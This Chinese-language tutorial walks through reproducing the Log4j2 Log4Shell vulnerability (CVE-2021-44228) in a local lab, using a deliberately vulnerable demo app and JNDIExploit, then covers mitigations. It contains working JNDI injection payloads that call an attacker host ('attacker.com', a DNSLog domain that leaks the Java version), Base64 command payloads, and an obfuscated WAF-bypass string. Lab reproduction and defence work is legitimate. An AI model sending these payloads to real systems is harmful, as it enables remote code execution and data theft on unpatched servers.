1. Log4j2漏洞背景与原理剖析2021年底爆发的Log4j2远程代码执行漏洞CVE-2021-44228堪称近年来影响范围最广的安全事件之一。这个漏洞的特别之处在于它隐藏在Java生态中最基础的日志组件中就像一颗埋在基础设施里的定时炸弹。我至今记得当时半夜被运维电话吵醒紧急处理线上服务时的场景。简单来说漏洞源于Log4j2对日志消息中**${}表达式**的处理机制。当系统记录包含类似${jndi:ldap://attacker.com/exp}的日志时Log4j2会主动向指定的LDAP服务器发起请求并执行返回的Java对象。攻击者正是利用这个特性通过构造特殊的日志消息实现远程代码执行。举个生活化的例子这就像快递员Log4j2在记录包裹信息时发现备注栏写着请到${某地址}取说明书结果快递员真的跑去陌生地址取回了一个会自动组装的危险物品。更可怕的是这个地址可以用DNS域名表示使得攻击源难以追踪。2. 实验环境搭建指南2.1 基础环境准备建议使用Linux系统进行实验我用的Ubuntu 20.04Windows用户可以用WSL2。需要提前安装JDK 8或11推荐OpenJDKMaven 3.6Python 3.x用于运行漏洞利用工具验证环境是否就绪java -version mvn -v python3 --version2.2 漏洞演示应用搭建我们从GitHub克隆一个故意包含漏洞的演示应用git clone https://github.com/christophetd/log4shell-vulnerable-app cd log4shell-vulnerable-app mvn package java -jar target/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar这个Spring Boot应用会在8080端口启动使用了存在漏洞的Log4j2 2.14.1版本。你可以访问http://localhost:8080看到登录页面这就是我们的靶场。2.3 攻击工具配置我们需要两个关键工具JNDIExploit用于搭建恶意LDAP服务器Burp Suite Community构造恶意请求下载并启动JNDIExploitwget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip unzip JNDIExploit.v1.2.zip java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your_local_ip -p 8888注意替换your_local_ip为你的本机IP8888是HTTP服务端口LDAP默认在1389端口监听。3. 漏洞复现全流程3.1 构造恶意请求启动Burp Suite配置浏览器代理后拦截向http://localhost:8080/login的POST请求。在username参数处插入我们的攻击载荷${jndi:ldap://your_local_ip:1389/Basic/Command/Base64/d2hvYW1p}这个Base64编码的字符串解码后是whoami命令。你也可以替换为其他命令比如计算器${jndi:ldap://your_local_ip:1389/Basic/Command/Base64/Y2FsYw} # calc3.2 观察攻击效果发送请求后查看JNDIExploit的控制台输出你会看到类似这样的信息[] Received LDAP Query: Basic/Command/Base64/d2hvYW1p [] Paylaod: command [] Command: whoami同时在靶机应用的控制台你会看到命令执行结果。如果是在Windows系统测试应该能看到当前用户名。3.3 常见问题排查问题1JNDIExploit启动时报端口冲突解决方案通过-p参数指定其他HTTP端口如-p 8889问题2请求发送后无响应检查防火墙是否放行了1389(LDAP)和8888(HTTP)端口确认IP地址是否正确不要用127.0.0.1要用本机局域网IP问题3命令执行但无回显尝试使用DNSLog验证${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}检查Java版本建议使用JDK 8u191以下版本测试4. 漏洞深度解析4.1 技术原理拆解整个攻击链条可以分为四个关键阶段注入点触发应用记录包含${jndi:ldap://...}的日志JNDI解析Log4j2调用JNDI管理器解析LDAP地址代码下载从攻击者控制的LDAP服务器获取恶意Java类动态加载通过ClassLoader执行远程代码这个过程中最致命的是Log4j2默认启用了lookup功能且JNDI在低版本Java中默认支持远程代码加载。后来自Java 8u191开始LDAP远程加载被限制这也是为什么建议用旧版JDK测试。4.2 漏洞利用变种除了直接执行命令攻击者还可以通过${env:USER}泄露系统环境变量使用${date:MM-dd-yyyy}进行端口扫描结合${lower:}等嵌套表达式绕过WAF检测我曾在实际测试中发现一个有趣的变形${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/exp}这种写法可以绕过简单的字符串匹配检测。5. 防御与修复方案5.1 临时缓解措施如果当时你负责的系统受影响可能会采取这些紧急方案设置JVM参数-Dlog4j2.formatMsgNoLookupstrue删除log4j-core包中的JndiLookup类zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class升级到2.15.0及以上版本5.2 长期防护建议从架构角度我建议网络层出向流量限制LDAP/RMI等协议开发层建立第三方组件安全评估流程运维层部署RASP进行运行时防护有个实际案例某公司通过WAF拦截所有包含${jndi:的请求结果攻击者改用${${::-j}ndi:绕过。这告诉我们单一防护是不够的需要纵深防御。6. 拓展实验与思考6.1 高版本Java测试尝试在JDK 8u191或JDK 11环境复现你会发现攻击失效。这是因为Oracle引入了com.sun.jndi.ldap.object.trustURLCodebasefalsecom.sun.jndi.rmi.object.trustURLCodebasefalse但注意这并不绝对安全攻击者仍可能通过本地ClassPath中的类进行利用。6.2 其他利用工具对比除了JNDIExploit你还可以测试marshalsec轻量级但功能较少rogue-jndi支持更多协议转换log4j-bypass专用于WAF绕过在我的测试中JNDIExploit的兼容性最好但marshalsec在低资源环境下更稳定。